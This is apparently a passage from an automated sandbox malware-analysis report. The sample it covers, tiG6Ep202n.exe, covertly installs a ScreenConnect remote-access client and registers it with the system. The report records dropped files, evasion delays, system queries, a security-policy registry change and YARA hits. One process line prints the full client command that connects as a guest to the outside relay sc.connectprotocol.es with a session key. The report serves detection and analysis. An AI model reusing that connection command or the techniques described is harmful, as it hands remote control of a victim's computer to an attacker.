                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeProcess information set: NOOPENFILEERRORBOX
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 1790000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 3170000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 1790000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 68B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 6090000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 68B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 78B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: 88B0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMemory allocated: BF0000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMemory allocated: 1140000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: F90000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: 1AA50000 memory reserve | memory write watchJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: B20000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeMemory allocated: 1A840000 memory reserve | memory write watch
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3472B581 rdtsc 9_2_00007FFD3472B581
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsCredentialProvider.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsBackstageShell.exeJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\msiexec.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.Cab.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.InstallerActions.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.Compression.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSIA097.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsAuthenticationPackage.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsFileManager.exeJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Windows\Installer\MSI9C7F.tmpJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Windows\SysWOW64\rundll32.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.dllJump to dropped file
                                  Source: C:\Windows\System32\msiexec.exeDropped PE file which has not been started: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dllJump to dropped file
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exe TID: 5048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe TID: 4208Thread sleep count: 36 > 30Jump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 6552Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Windows\System32\svchost.exe TID: 6552Thread sleep time: -30000s >= -30000sJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe TID: 2996Thread sleep time: -922337203685477s >= -30000s
                                  Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeThread delayed: delay time: 922337203685477
                                  Source: svchost.exe, 0000000A.00000002.3879070924.0000027B76E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000A.00000002.3879809861.0000027B7C45D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: ScreenConnect.ClientService.exe, 00000008.00000002.4031684768.0000000004670000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeCode function: 9_2_00007FFD3472B581 rdtsc 9_2_00007FFD3472B581
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeProcess token adjusted: DebugJump to behavior
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeMemory allocated: page read and write | page guardJump to behavior

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  .NET source code references suspicious native API functions
                                  Source: 0.2.tiG6Ep202n.exe.3140000.0.raw.unpack, Program.csReference to suspicious API methods: FindResource(moduleHandle, e.Name, "FILES")
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualAlloc(attemptImageBase, dwSize, WindowsNative.MEM.MEM_COMMIT | WindowsNative.MEM.MEM_RESERVE, WindowsNative.PAGE.PAGE_READWRITE)
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.LoadLibrary(loadedImageBase + ptr[i].Name)
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.GetProcAddress(intPtr, ptr5)
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsMemoryNativeLibrary.csReference to suspicious API methods: WindowsNative.VirtualProtect(loadedImageBase + sectionHeaders[i].VirtualAddress, (IntPtr)num, flNewProtect, &pAGE)
                                  Source: 0.2.tiG6Ep202n.exe.5880000.7.raw.unpack, WindowsExtensions.csReference to suspicious API methods: HandleMinder.CreateWithFunc(WindowsNative.OpenProcess(processAccess, bInheritHandle: false, processID), WindowsNative.CloseHandle)
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"Jump to behavior
                                  Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe "c:\program files (x86)\screenconnect client (a532d472f1ff1d4e)\screenconnect.clientservice.exe" "?e=access&y=guest&h=sc.connectprotocol.es&p=8041&s=16dcb7ee-2b94-4a51-a426-55c28e344f1f&k=bgiaaackaabsu0exaagaaaeaaqc1kwkbpg72shug%2fcugwqb7iuebcyny1kcdtceo3n0ry4axiph%2ffmztln0b%2bg2miuqorkgq0xsvxj7wucz%2bdiimwdt7qllgfko33osoqisfilkobrosqmoo0cyg%2fpkva7aaau%2bym8zey9okpyj7knkvh679krkgwwm5tfc%2fbhzztt1d5pfiewfvi67rlcagqxh1hudy%2bbdi6lg6r8m8lqczrbhxazj%2fuvxvugxn6zwttc7e00yjiy6fpwniox5ej%2fn2ux9gcwu%2bpspaixxjhoyehv84bhaut0rgc1re8m9puttx9udji37opbolw%2f5qq735uizmwagufhfj%2flzeryvq&t=old-01"
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Progman
                                  Source: ScreenConnect.WindowsClient.exe, 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.drBinary or memory string: Shell_TrayWnd-Shell_SecondaryTrayWnd%MsgrIMEWindowClass
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSI9606.tmp-\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Client.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Core.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.Windows.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.dll VolumeInformation
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_04F80CC8 CreateNamedPipeW,8_2_04F80CC8
                                  Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exeCode function: 8_2_00BF4C71 RtlGetVersion,8_2_00BF4C71
                                  Source: C:\Users\user\Desktop\tiG6Ep202n.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                  Lowering of HIPS / PFW / Operating System Security Settings

                                  barindex
                                  Modifies security policies related information
                                  Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                                  Source: Yara matchFile source: tiG6Ep202n.exe, type: SAMPLE
                                  Source: Yara matchFile source: 0.2.tiG6Ep202n.exe.5a60000.12.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.2.ScreenConnect.WindowsClient.exe.2acfa18.0.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.7e0000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.2.tiG6Ep202n.exe.5a60000.12.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 11.2.ScreenConnect.WindowsClient.exe.28bfa50.4.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.tiG6Ep202n.exe.b45db0.3.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.tiG6Ep202n.exe.b1c3d4.5.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.tiG6Ep202n.exe.a963d4.2.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 0.0.tiG6Ep202n.exe.a80000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000000.00000002.2173892307.0000000005A60000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000002.4011949358.0000000002A51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000009.00000000.2206952952.00000000007E2000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000002.2178858378.00000000068B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000000.00000000.2138892674.0000000000A96000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 0000000B.00000002.2258615488.0000000002841000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                  Source: Yara matchFile source: Process Memory Space: tiG6Ep202n.exe PID: 5500, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 1588, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 504, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 672, type: MEMORYSTR
                                  Source: Yara matchFile source: C:\Windows\Installer\inprogressinstallinfo.ipi, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFA2315AC072D60478.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF05F0D14B49496305.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFA01B11556604F6BD.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DF5F6339E16C6791FF.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFB9D17362A4D0E7A8.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Temp\~DFE4D607A3416BF7CD.TMP, type: DROPPED
                                  Source: Yara matchFile source: C:\Config.Msi\6699fe.rbs, type: DROPPED
                                  Source: Yara matchFile source: C:\Windows\Installer\MSI9C5F.tmp, type: DROPPED
                                  Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, type: DROPPED

                                  Mitre Att&ck Matrix

                                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                  Gather Victim Identity InformationAcquire Infrastructure1
                                  Valid Accounts                                  		31
                                  Windows Management Instrumentation                                  		1
                                  DLL Side-Loading                                  		1
                                  DLL Side-Loading                                  		11
                                  Disable or Modify Tools                                  		OS Credential Dumping11
                                  Peripheral Device Discovery                                  		Remote Services11
                                  Archive Collected Data                                  		2
                                  Encrypted Channel                                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                                  CredentialsDomains1
